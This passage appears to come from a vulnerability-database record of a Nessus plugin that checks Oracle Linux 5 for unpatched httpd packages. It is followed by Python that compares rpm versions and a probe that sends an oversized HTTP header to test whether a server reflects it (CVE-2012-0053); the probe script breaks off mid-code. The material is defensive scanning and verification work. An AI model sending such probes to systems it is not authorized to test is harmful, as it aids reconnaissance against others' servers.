ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"httpd-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-devel-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-manual-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mod_ssl-2.2.3-63.0.1.el5_8.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / mod_ssl\");\n}\n", "title": "Oracle Linux 5 : httpd (ELSA-2012-0323)", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:29:45"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:mod_ssl", "p-cpe:/a:oracle:linux:httpd-manual"], "cvelist": ["CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", "CVE-2012-0053"], "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "From Red Hat Security Advisory 2012:0323 :\n\nUpdated httpd packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. 
Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via RHSA-2011:1392) did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a '.htaccess' file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information. A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. 
After installing the updated packages, the httpd daemon will be restarted automatically.", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "ef3d56bbe21de5ffe4d73bd6061a2d2003e01d394c5cec4df8dd78675c1f78d4", "hashmap": [{"hash": "d1dbaeba1e966650b0fbca5997bf675c", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "ba5421b34c575442e1dfc9eefc2b01f3", "key": "title"}, {"hash": "9d4ba84f3eb908a12ad8af29607f5852", "key": "description"}, {"hash": "3c09fd39dca9bce8dafe505ecf682fca", "key": "href"}, {"hash": "8f7ef314d920891c344985cdc4f824f1", "key": "cpe"}, {"hash": "e31ed89ab0cbb68ce2c40f17ec1e5483", "key": "naslFamily"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0db193a0effe2d65dffecdb5e4d9c241", "key": "published"}, {"hash": "be3ffe9319ca8bf2f8c339435e78948f", "key": "modified"}, {"hash": "292f2e293571b0e70e3182b615982dad", "key": "cvss"}, {"hash": "21d1eb58c85fb6f05d58534760094021", "key": "references"}, {"hash": "16ae3c93dc83302d463471eefbc44076", "key": "cvelist"}, {"hash": "7d77095f188ad2b45d2c83a576a305e2", "key": "pluginID"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=68488", "id": "ORACLELINUX_ELSA-2012-0323.NASL", "lastseen": "2017-10-29T13:32:56", "modified": "2015-12-01T00:00:00", "naslFamily": "Oracle Linux Local Security Checks", "objectVersion": "1.3", "pluginID": "68488", "published": "2013-07-12T00:00:00", "references": ["https://oss.oracle.com/pipermail/el-errata/2012-March/002683.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0323 and \n# Oracle Linux Security Advisory ELSA-2012-0323 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68488);\n 
script_version(\"$Revision: 1.5 $\");\n script_cvs_date(\"$Date: 2015/12/01 17:07:15 $\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50322, 50494, 51407, 51706, 51869);\n script_osvdb_id(76744, 77444, 78293, 78556);\n script_xref(name:\"RHSA\", value:\"2012:0323\");\n\n script_name(english:\"Oracle Linux 5 : httpd (ELSA-2012-0323)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0323 :\n\nUpdated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1392) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. 
Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-March/002683.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"httpd-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-devel-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-manual-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mod_ssl-2.2.3-63.0.1.el5_8.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / mod_ssl\");\n}\n", "title": "Oracle Linux 5 : httpd (ELSA-2012-0323)", "type": "nessus", "viewCount": 1}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-10-29T13:32:56"}], "edition": 6, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "8f7ef314d920891c344985cdc4f824f1"}, {"key": "cvelist", "hash": "16ae3c93dc83302d463471eefbc44076"}, {"key": "cvss", "hash": "292f2e293571b0e70e3182b615982dad"}, {"key": "description", "hash": "fd50af444fa6f1e3cc440c5416dbd7c3"}, {"key": "href", "hash": "3c09fd39dca9bce8dafe505ecf682fca"}, {"key": "modified", "hash": "2e3c438f66403fd816adabf5a1b82b29"}, {"key": "naslFamily", "hash": "e31ed89ab0cbb68ce2c40f17ec1e5483"}, {"key": "pluginID", "hash": "7d77095f188ad2b45d2c83a576a305e2"}, {"key": "published", "hash": "0db193a0effe2d65dffecdb5e4d9c241"}, {"key": "references", "hash": 
"21d1eb58c85fb6f05d58534760094021"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "a32f25318843d8ff315ab9875d6d2ee1"}, {"key": "title", "hash": "ba5421b34c575442e1dfc9eefc2b01f3"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "20195c94692bd896f681dabb7f4098129fd0de1599ab2f261dda9bdeb0e3b250", "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-3607", "CVE-2012-0031", "CVE-2012-0053", "CVE-2011-3639"]}, {"type": "f5", "idList": ["F5:K15889", "F5:K16907", "SOL16907", "SOL15889", "F5:K20979231", "SOL15273", "SOL20979231"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0323", "ELSA-2012-0128", "ELSA-2013-0512"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310120253", "OPENVAS:1361412562310123992", "OPENVAS:1361412562310123980", "OPENVAS:1361412562310870571", "OPENVAS:870571", "OPENVAS:1361412562310881089", "OPENVAS:136141256231070724", "OPENVAS:870631", "OPENVAS:881089", "OPENVAS:70724"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2012-0128.NASL", "REDHAT-RHSA-2012-0128.NASL", "ORACLELINUX_ELSA-2012-0128.NASL", "SL_20120221_HTTPD_ON_SL5_X.NASL", "SL_20120213_HTTPD_ON_SL6_X.NASL", "ALA_ALAS-2012-46.NASL", "REDHAT-RHSA-2012-0323.NASL", "DEBIAN_DSA-2405.NASL", "UBUNTU_USN-1368-1.NASL", "OPENSUSE-2012-132.NASL"]}, {"type": "redhat", "idList": ["RHSA-2012:0323", "RHSA-2012:0128", "RHSA-2012:0542"]}, {"type": "seebug", "idList": ["SSV:30056", "SSV:23169", "SSV:30024"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2405-1:AE657"]}, {"type": "centos", "idList": ["CESA-2012:0128"]}, {"type": "amazon", "idList": ["ALAS-2012-046"]}, {"type": "ubuntu", "idList": ["USN-1368-1"]}, {"type": "slackware", "idList": ["SSA-2012-041-01"]}, {"type": "freebsd", "idList": ["4B7DBFAB-4C6B-11E1-BC16-0023AE8E59F0"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12166", "SECURITYVULNS:DOC:27611", 
"SECURITYVULNS:VULN:12139"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2012:0314-1", "SUSE-SU-2012:0284-1", "SUSE-SU-2012:0323-1"]}, {"type": "kaspersky", "idList": ["KLA10065"]}, {"type": "httpd", "idList": ["HTTPD:560EB66BD0C9D4921E114954F57484F0", "HTTPD:CD3865BDB48B91719A525A87DFA73750", "HTTPD:98531A1B4917D4CDD88FDEF74307A1F3", "HTTPD:19058D084C7C00E6FB6A3AD068C9416B", "HTTPD:8BA47632F35C9AB31E24EEFA64CB532A", "HTTPD:2D6863E2D9663FEAEBBED0A62CE75D64"]}, {"type": "exploitdb", "idList": ["EDB-ID:41768"]}, {"type": "zdt", "idList": ["1337DAY-ID-27465"]}, {"type": "gentoo", "idList": ["GLSA-201206-25"]}], "modified": "2019-01-16T20:16:46"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0323 and \n# Oracle Linux Security Advisory ELSA-2012-0323 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68488);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/18 17:43:56\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50322, 50494, 51407, 51706, 51869);\n script_xref(name:\"RHSA\", value:\"2012:0323\");\n\n script_name(english:\"Oracle Linux 5 : httpd (ELSA-2012-0323)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0323 :\n\nUpdated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. 
Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1392) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-March/002683.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif 
(!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"httpd-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-devel-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-manual-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mod_ssl-2.2.3-63.0.1.el5_8.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / mod_ssl\");\n}\n", "naslFamily": "Oracle Linux Local Security Checks", "pluginID": "68488", "cpe": ["p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:mod_ssl", "p-cpe:/a:oracle:linux:httpd-manual"]}
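The plugin above reports the host only after rpm_check() finds an installed httpd, httpd-devel, httpd-manual or mod_ssl whose epoch:version-release sorts below the fixed build (httpd-2.2.3-63.0.1.el5_8.1 and siblings); otherwise it audits "not affected" or "not installed". The following Python reproduces that decision so the ordering can be checked by hand. It is example code added to this page, not Tenable's rpm.inc: rpmvercmp() is a port of rpm's segment-wise comparison (digits compare numerically, letters as strings, digits beat letters, a tilde sorts below everything; the newer caret operator is omitted), the arch-suffix stripping assumes `rpm -qa` output that ends in one of the arches the plugin accepts, and the installed package list is constructed.

```python
"""Re-implement the decision the plugin makes with rpm_check(): compare each
installed package's epoch:version-release with the fixed NEVR using rpm's own
ordering. Example code added to this page, not Tenable's rpm.inc; the sample
package list is constructed."""
import re

# Arch suffixes the plugin accepts (x86_64, ia64, i[3-6]86) plus noarch;
# `rpm -qa` output without an arch is left unchanged. (Assumption.)
ARCH_SUFFIX = re.compile(r"\.(x86_64|ia64|i[3-6]86|noarch)$")

# The fixed packages this advisory ships, as listed in the plugin.
FIXED = [
    "httpd-2.2.3-63.0.1.el5_8.1",
    "httpd-devel-2.2.3-63.0.1.el5_8.1",
    "httpd-manual-2.2.3-63.0.1.el5_8.1",
    "mod_ssl-2.2.3-63.0.1.el5_8.1",
]


def rpmvercmp(a: str, b: str) -> int:
    """Port of rpm's rpmvercmp(): walk both strings segment by segment, where a
    segment is a run of digits or a run of letters and anything else separates.
    Digit runs compare numerically (leading zeros dropped), letter runs compare
    as strings, digits beat letters, and '~' sorts below everything including
    end of string (so 1.0~rc1 < 1.0). The caret operator is not handled."""
    if a == b:
        return 0
    i = j = 0
    while i < len(a) or j < len(b):
        while i < len(a) and not (a[i].isalnum() or a[i] == "~"):
            i += 1
        while j < len(b) and not (b[j].isalnum() or b[j] == "~"):
            j += 1
        tilde_a = i < len(a) and a[i] == "~"
        tilde_b = j < len(b) and b[j] == "~"
        if tilde_a or tilde_b:
            if not tilde_a:
                return 1
            if not tilde_b:
                return -1
            i += 1
            j += 1
            continue
        if i >= len(a) or j >= len(b):
            break
        isnum = a[i].isdigit()
        pattern = r"[0-9]+" if isnum else r"[A-Za-z]+"
        seg_a = re.match(pattern, a[i:]).group(0)
        m_b = re.match(pattern, b[j:])
        if m_b is None:                      # segment types differ: numeric is newer
            return 1 if isnum else -1
        seg_b = m_b.group(0)
        i += len(seg_a)
        j += len(seg_b)
        if isnum:
            seg_a, seg_b = seg_a.lstrip("0"), seg_b.lstrip("0")
            if len(seg_a) != len(seg_b):
                return 1 if len(seg_a) > len(seg_b) else -1
        if seg_a != seg_b:
            return 1 if seg_a > seg_b else -1
    if i >= len(a) and j >= len(b):
        return 0
    return -1 if i >= len(a) else 1


def split_nevr(pkg: str):
    """'httpd-1:2.2.3-53.el5.x86_64' -> ('httpd', 1, '2.2.3', '53.el5').
    Epoch defaults to 0 when absent, as rpm treats it."""
    name, version, release = ARCH_SUFFIX.sub("", pkg).rsplit("-", 2)
    epoch = 0
    if ":" in version:
        epoch_str, version = version.split(":", 1)
        epoch = int(epoch_str)
    return name, epoch, version, release


def evr_cmp(a, b) -> int:
    """Order (epoch, version, release) tuples the way rpm does: epoch first."""
    if a[0] != b[0]:
        return 1 if a[0] > b[0] else -1
    return rpmvercmp(a[1], b[1]) or rpmvercmp(a[2], b[2])


def check_host(installed, references=FIXED) -> dict:
    """Per reference package: 'vulnerable' if any installed build of that name is
    older than the fix (the plugin's security_warning branch), 'patched' if all
    are at or past it (AUDIT_PACKAGE_NOT_AFFECTED), else 'not installed'."""
    by_name = {}
    for pkg in installed:
        name, *evr = split_nevr(pkg)
        by_name.setdefault(name, []).append(tuple(evr))
    status = {}
    for ref in references:
        name, *ref_evr = split_nevr(ref)
        if name not in by_name:
            status[name] = "not installed"
        elif any(evr_cmp(evr, tuple(ref_evr)) < 0 for evr in by_name[name]):
            status[name] = "vulnerable"
        else:
            status[name] = "patched"
    return status


# Constructed `rpm -qa` excerpt: mod_ssl was updated, httpd and httpd-manual were not.
SAMPLE_RPM_LIST = [
    "httpd-2.2.3-53.el5.x86_64",
    "httpd-manual-2.2.3-53.el5.x86_64",
    "mod_ssl-2.2.3-63.0.1.el5_8.1.x86_64",
    "openssl-0.9.8e-22.el5.x86_64",
]

if __name__ == "__main__":
    for name, state in check_host(SAMPLE_RPM_LIST).items():
        print(f"{name:13} {state}")
```

Feed it the output of `rpm -qa` from the target to get the same verdict the plugin would reach. Note that on a multilib host the i386 and x86_64 builds are checked independently, so one stale arch is enough to flag the package, exactly as rpm_check() behaves; an epoch in the installed package outranks any version or release difference.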
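The advisory text in the plugin description describes CVE-2012-0053 as httpd copying the full offending header line into its default 400 error page when a request header is too long or malformed, which is what let script in the server's origin read HttpOnly cookies. After applying the update a practitioner would want to confirm the echo is actually gone on the deployed server, and the following Python does that. It is an added example, not part of the plugin, of the advisory or of httpd: build_probe() constructs a request whose single X-Probe header exceeds httpd 2.2's default LimitRequestFieldSize of 8190 bytes and carries a marker string; header_reflected() reports whether a 400 response body contains that marker; send_probe() sends it over a plain TCP socket to a host you name. The two canned responses are constructed stand-ins for pre- and post-fix behaviour, not captures from a real server.

```python
"""Verification check for CVE-2012-0053: does the 400 Bad Request page echo an
over-long request header? Example code added to this page; the canned
responses are constructed, not captured from httpd."""
import socket

MARKER = "cve-2012-0053-probe"       # string we look for in the error body
DEFAULT_FIELD_LIMIT = 8190           # httpd 2.2 default LimitRequestFieldSize


def build_probe(host: str, field_len: int = DEFAULT_FIELD_LIMIT + 1000) -> bytes:
    """Raw HTTP/1.1 request whose X-Probe header line is field_len bytes long,
    so httpd rejects it with 400. A vulnerable server copies the whole header
    line, marker included, into the error page; a patched server does not."""
    value = MARKER + "A" * (field_len - len("X-Probe: ") - len(MARKER))
    request = (
        f"GET / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"X-Probe: {value}\r\n"
        f"Connection: close\r\n"
        f"\r\n"
    )
    return request.encode("ascii")


def header_reflected(response: bytes) -> bool:
    """True when the response is a 400 whose body contains the marker, i.e. the
    server still reflects rejected header lines into the error document."""
    head, _, body = response.partition(b"\r\n\r\n")
    status = head.split(b"\r\n", 1)[0].split()
    if len(status) < 2 or status[1] != b"400":
        return False
    return MARKER.encode("ascii") in body


def send_probe(host: str, port: int = 80, timeout: float = 5.0) -> bytes:
    """Send the probe over a plain TCP socket and return the raw response.
    Only run this against a server you own or are authorized to test."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_probe(host))
        chunks = []
        while True:
            data = s.recv(65536)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


# Constructed stand-ins for the two behaviours (not real httpd captures).
VULNERABLE_RESPONSE = (
    b"HTTP/1.1 400 Bad Request\r\nServer: Apache\r\nContent-Type: text/html\r\n\r\n"
    b"<h1>Bad Request</h1><p>Size of a request header field exceeds server limit.<br />"
    b"<pre>\nX-Probe: " + MARKER.encode("ascii") + b"AAAA...\n</pre></p>"
)
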